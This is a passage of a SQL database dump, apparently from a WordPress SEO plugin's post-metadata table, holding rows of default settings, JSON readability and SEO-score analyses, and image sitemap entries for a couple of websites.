05:37:09'),(4,5,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:37:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-01-25 05:37:09'),(5,8,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:37:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-01-25 05:37:09'),(6,9,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,0,1,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:37:09',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-01-25 05:37:09'),(7,10,NULL,NULL,'[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,0,1,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-01-25 05:37:09','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-03-08 11:36:21'),(8,11,NULL,NULL,'[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,0,1,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-01-25 05:37:09','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 05:37:09','2022-02-17 11:15:18'),(9,521,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(10,560,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/homedirect.in\\/pub\\/media\\/wysiwyg\\/ic001.png\"},{\"image:loc\":\"https:\\/\\/homedirect.in\\/pub\\/media\\/wysiwyg\\/ic002.png\"},{\"image:loc\":\"https:\\/\\/homedirect.in\\/pub\\/media\\/wysiwyg\\/ic003.png\"},{\"image:loc\":\"https:\\/\\/homedirect.in\\/pub\\/media\\/wysiwyg\\/ic004.png\"}]','2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(11,562,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(12,564,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(13,566,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(14,568,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(15,252,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2020\\/06\\/post22.jpg\",\"image:title\":\"post22\",\"image:caption\":\"\"}]','2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(16,256,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2020\\/06\\/post1.jpg\",\"image:title\":\"post1\",\"image:caption\":\"\"}]','2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(17,480,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(18,1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,NULL,'2022-01-25 05:49:54',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:49:54','2022-01-25 05:49:54'),(19,529,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/02.png\",\"image:title\":\"02\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(20,530,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/03.png\",\"image:title\":\"03\",\"image:caption\":\"\"}]','2022-01-31 11:33:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-31 11:33:31'),(21,531,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/04.png\",\"image:title\":\"04\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(22,532,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/05.png\",\"image:title\":\"05\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(23,533,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/06.png\",\"image:title\":\"06\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(24,534,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/07.png\",\"image:title\":\"07\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(25,535,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/08.png\",\"image:title\":\"08\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(26,536,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/09.png\",\"image:title\":\"09\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(27,537,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/www.mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/10.png\",\"image:title\":\"10\",\"image:caption\":\"\"}]','2022-01-25 05:50:37',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-25 05:50:37'),(28,538,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/11.png\",\"image:title\":\"11\",\"image:caption\":\"\"}]','2022-01-31 11:33:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:50:37','2022-01-31 11:33:31'),(29,539,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/12.png\",\"image:title\":\"12\",\"image:caption\":\"\"}]','2022-01-31 11:33:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:51:19','2022-01-31 11:33:31'),(30,540,NULL,NULL,'[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 67.5 in the test, which is considered ok to read.\",\"score\":9,\"maxScore\":9,\"error\":0},\"errors\":1}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,68,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"advanced\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/13.png\",\"image:title\":\"13\",\"image:caption\":\"\"}]','2022-02-04 12:11:45','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 05:51:20','2022-02-04 12:11:45'),(31,541,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/14-2.png\",\"image:title\":\"14\",\"image:caption\":\"\"}]','2022-01-31 11:33:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:51:20','2022-01-31 11:33:31'),(32,542,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,'default','default',NULL,NULL,NULL,NULL,NULL,0,'default',NULL,0,1,0,0,0,0,0,0,0,NULL,NULL,'large',NULL,'[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/15.png\",\"image:title\":\"15\",\"image:caption\":\"\"}]','2022-01-31 11:33:31',NULL,NULL,NULL,NULL,NULL,NULL,0,'2022-01-25 05:51:20','2022-01-31 11:33:31'),(33,543,NULL,NULL,'[]','{\"focus\":[],\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is over 160 characters.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"100% of the sentences contain passive voice, which is more than the recommended maximum of 10%. Try to use their active counterparts.\",\"score\":3,\"maxScore\":9,\"error\":1},\"transitionWords\":{\"title\":\"Transition words\",\"description\":\"None of the sentences contain transition words. Use some.\",\"score\":3,\"maxScore\":9,\"error\":1},\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 37.8 in the test, which is considered difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,59,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}','[{\"image:loc\":\"https:\\/\\/mangomitra.in\\/wp-content\\/uploads\\/2022\\/01\\/16.png\",\"image:title\":\"16\",\"image:caption\":\"\"}]','2022-02-04 05:10:51','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 05:51:20','2022-02-04 05:10:51'),(34,590,NULL,NULL,'[]','{\"focus\":{\"keyphrase\":\"\",\"score\":0,\"analysis\":{\"keyphraseInTitle\":{\"score\":0,\"maxScore\":9,\"error\":1}}},\"additional\":[]}','{\"analysis\":{\"basic\":{\"metadescriptionLength\":{\"title\":\"Meta description length\",\"description\":\"The meta description is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"lengthContent\":{\"title\":\"Content length\",\"description\":\"This is far below the recommended minimum of words.\",\"score\":-20,\"maxScore\":9,\"error\":1},\"isInternalLink\":{\"title\":\"Internal links\",\"description\":\"We couldn\'t find any internal links in your content. Add internal links in your content.\",\"score\":3,\"maxScore\":9,\"error\":1},\"isExternalLink\":{\"title\":\"External links\",\"description\":\"No outbound links were found. Link out to external resources.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":4},\"title\":{\"titleLength\":{\"title\":\"SEO Title length\",\"description\":\"The title is too short.\",\"score\":6,\"maxScore\":9,\"error\":1},\"errors\":1},\"readability\":{\"contentHasAssets\":{\"error\":1,\"title\":\"Images\\/videos in content\",\"description\":\"You are not using rich media like images or videos.\",\"score\":1,\"maxScore\":5},\"paragraphLength\":{\"title\":\"Paragraphs length\",\"description\":\"You are using short paragraphs.\",\"score\":5,\"maxScore\":5,\"error\":0},\"sentenceLength\":{\"title\":\"Sentences length\",\"description\":\"Sentence length is looking great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"passiveVoice\":{\"title\":\"Passive voice\",\"description\":\"You\'re using enough active voice. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"transitionWords\":[],\"consecutiveSentences\":{\"title\":\"Consecutive sentences\",\"description\":\"There is enough variety in your sentences. That\'s great!\",\"score\":9,\"maxScore\":9,\"error\":0},\"subheadingsDistribution\":{\"title\":\"Subheading distribution\",\"description\":\"You are not using any subheadings, but your text is short enough and probably doesn\'t need them.\",\"score\":9,\"maxScore\":9,\"error\":0},\"calculateFleschReading\":{\"title\":\"Flesch reading ease\",\"description\":\"The copy scores 0 in the test, which is considered very difficult to read. Try to make shorter sentences, using less difficult words to improve readability.\",\"score\":3,\"maxScore\":9,\"error\":1},\"errors\":2}}}',NULL,NULL,NULL,'default','default',NULL,NULL,NULL,NULL,NULL,'',NULL,NULL,'[]',0,'default','default',NULL,NULL,NULL,NULL,NULL,64,'default','{\"article\":{\"articleType\":\"BlogPosting\"},\"course\":{\"name\":\"\",\"description\":\"\",\"provider\":\"\"},\"faq\":{\"pages\":[]},\"product\":{\"reviews\":[]},\"recipe\":{\"ingredients\":[],\"instructions\":[],\"keywords\":[]},\"software\":{\"reviews\":[],\"operatingSystems\":[]},\"webPage\":{\"webPageType\":\"WebPage\"}}',0,1,0,0,0,0,0,0,0,-1,-1,'large','{\"tab\":\"general\",\"tab_social\":\"facebook\",\"tab_sidebar\":\"general\",\"tab_modal\":\"general\",\"tab_modal_social\":\"facebook\"}',NULL,'2022-01-25 06:07:52','default','default',NULL,NULL,NULL,NULL,0,'2022-01-25 06:07:52','2022-03-03 09:58:18'),(35,612,'#post_title #separator_sa 